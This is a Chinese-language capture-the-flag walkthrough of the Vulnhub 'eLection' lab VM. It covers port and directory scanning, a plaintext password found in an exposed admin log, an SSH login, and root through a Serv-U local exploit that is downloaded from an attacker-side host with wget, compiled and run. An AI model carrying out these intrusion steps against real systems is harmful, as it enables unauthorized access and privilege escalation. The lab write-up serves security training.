Vulnhub之election靶机详细测试过程
Election
作者: jason huawen
靶机信息
名称: eLection: 1
URL:
https://www.vulnhub.com/entry/election-1,503/
识别IP地址
─(kali㉿kali)-[~/Vulnhub/Election]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
urrently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:3f:57:98 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:4a:57:01 1 60 PCS Systemtechnik GmbH
NMAP Scanning
利用NMAP工具扫描目标主机:
──(kali㉿kali)-[~/Vulnhub/Election]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 20:56 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20d1ed84cc68a5a786f0dab8923fd967 (RSA)
| 256 7889b3a2751276922af98d27c108a7b9 (ECDSA)
|_ 256 b8f4d661cf1690c5071899b07c70fdc0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:4A:57:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
获取Shell
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ curl http://192.168.56.254/robots.txt
admin
wordpress
user
election
Robots.txt中只有election可以访问。
──(kali㉿kali)-[~/Vulnhub/Election]
└─$ nikto -h 192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-05-12 21:11:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ 8254 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-05-12 21:11:46 (GMT-4) (14 seconds)
---------------------------------------------------------------------------
──(kali㉿kali)-[~/Vulnhub/Election]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,bak,js,txt
[+] Timeout: 10s
===============================================================
2023/05/12 21:19:13 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10918]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.254/javascript/]
/robots.txt (Status: 200) [Size: 30]
/election (Status: 301) [Size: 319] [--> http://192.168.56.254/election/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.254/phpmyadmin/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/phpinfo.php (Status: 200) [Size: 95437]
/server-status (Status: 403) [Size: 279]
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ gobuster dir -u http://192.168.56.254/election -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/election
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,bak,js,txt
[+] Timeout: 10s
===============================================================
2023/05/12 21:21:49 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 7003]
/media (Status: 301) [Size: 325] [--> http://192.168.56.254/election/media/]
/themes (Status: 301) [Size: 326] [--> http://192.168.56.254/election/themes/]
/data (Status: 301) [Size: 324] [--> http://192.168.56.254/election/data/]
/admin (Status: 301) [Size: 325] [--> http://192.168.56.254/election/admin/]
/lib (Status: 301) [Size: 323] [--> http://192.168.56.254/election/lib/]
/languages (Status: 301) [Size: 329] [--> http://192.168.56.254/election/languages/]
/js (Status: 301) [Size: 322] [--> http://192.168.56.254/election/js/]
/card.php (Status: 200) [Size: 1935]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 1538169 / 1543927 (99.63%)
如果只是用gobuster扫描/election目录,就错过重要信息,甚至无法进行了。
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ curl http://192.168.56.254/election/card.php
00110000 00110001 00110001 00110001 00110000 00110001 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110001 00110000 00110000 00100000 00110000 00110000 00110000 00110000 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110000 00110000 00100000 00110000 00110001 00110001 00110000 00110000 00110000 00110000 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110001 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110000 00110001 00110001 00110000 00110001 00110000 00100000 00110000 00110001 00110001 00110001 00110001 00110000 00110000 00110000 00100000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110000 00110001 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110000 00100000 00110000 00110000 00110001 00110001 00110000 00110000 00110001 00110001 00100000 00110000 00110000 00110001 00110000 00110000 00110000 00110000 00110001 00100000 00110000 00110001 00110000 00110000 00110000 00110000 00110000 00110000 00100000 00110000 00110000 00110001 00110000 00110000 00110000 00110001 00110001
解码上述二进制数据,但是没啥卵用。
https://cryptii.com/pipes/binary-decoder
The quick brown 🦊 jumps over 13 lazy 🐶.
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ dirb http://192.168.56.254/election/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 12 22:03:10 2023
URL_BASE: http://192.168.56.254/election/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/election/ ----
==> DIRECTORY: http://192.168.56.254/election/admin/
==> DIRECTORY: http://192.168.56.254/election/data/
+ http://192.168.56.254/election/index.php (CODE:200|SIZE:7003)
==> DIRECTORY: http://192.168.56.254/election/js/
==> DIRECTORY: http://192.168.56.254/election/languages/
==> DIRECTORY: http://192.168.56.254/election/lib/
==> DIRECTORY: http://192.168.56.254/election/media/
==> DIRECTORY: http://192.168.56.254/election/themes/
---- Entering directory: http://192.168.56.254/election/admin/ ----
==> DIRECTORY: http://192.168.56.254/election/admin/ajax/
==> DIRECTORY: http://192.168.56.254/election/admin/components/
==> DIRECTORY: http://192.168.56.254/election/admin/css/
==> DIRECTORY: http://192.168.56.254/election/admin/img/
==> DIRECTORY: http://192.168.56.254/election/admin/inc/
+ http://192.168.56.254/election/admin/index.php (CODE:200|SIZE:8964)
==> DIRECTORY: http://192.168.56.254/election/admin/js/
==> DIRECTORY: http://192.168.56.254/election/admin/logs/
==> DIRECTORY: http://192.168.56.254/election/admin/plugins/
---- Entering directory: http://192.168.56.254/election/data/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/ajax/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/logs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/election/admin/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri May 12 22:03:14 2023
DOWNLOADED: 9224 - FOUND: 2
其实/election/admin用户登录有防火墙保护,不允许暴力破解。
http://192.168.56.254/election/admin/logs/
┌──(kali㉿kali)-[~/Vulnhub/Election]
└─$ cat system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown I
──(kali㉿kali)-[~/Vulnhub/Election]
└─$ ssh love@192.168.56.254
love@192.168.56.254's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
74 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr 9 23:19:28 2020 from 192.168.1.5
love@election:~$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
成功登录SSH:
love@election:~$ cd Desktop/
love@election:~/Desktop$ ls -alh
total 12K
drwxrwxrwx 2 love love 4.0K Apr 9 2020 .
drwsrwxrwx 18 love love 4.0K May 27 2020 ..
-rw-rw---- 1 love love 33 Apr 9 2020 user.txt
love@election:~/Desktop$ cat user.txt
cd38ac698c0d793a5236d01003f692b0
Privilege Escalation
love@election:/tmp$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
利用Serv-U的SUID位提权,但是其实也不是按SUID提权,而是找到该服务的本地提权漏洞。
love@election:/tmp$ wget http://192.168.56.253:8000/47009.c
--2023-05-13 11:15:14-- http://192.168.56.253:8000/47009.c
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [text/x-csrc]
Saving to: ‘47009.c’
47009.c 100%[============================================================================>] 619 --.-KB/s in 0s
2023-05-13 11:15:14 (128 MB/s) - ‘47009.c’ saved [619/619]
love@election:/tmp$ gcc 47009.c -o exploit
love@election:/tmp$ chmod +x exploit
love@election:/tmp$ ./exploit
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# cd /root
# ls -alh
total 44K
drwx------ 6 root root 4.0K May 13 06:22 .
drwxr-xr-x 24 root root 4.0K Apr 8 2020 ..
-rw------- 1 root root 66 May 27 2020 .bash_history
drwx------ 3 root root 4.0K Apr 8 2020 .cache
drwx------ 5 root root 4.0K May 27 2020 .config
drwx------ 3 root root 4.0K Oct 20 2019 .gnupg
drwxr-xr-x 3 root root 4.0K Oct 20 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Apr 9 2020 root.txt
-rw-r--r-- 1 root root 66 Apr 2 2020 .selected_editor
-rw-r----- 1 root root 5 May 13 06:22 .vboxclient-display-svga.pid
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6
#
STRIVE FOR PROGRESS,NOT FOR PERFECTION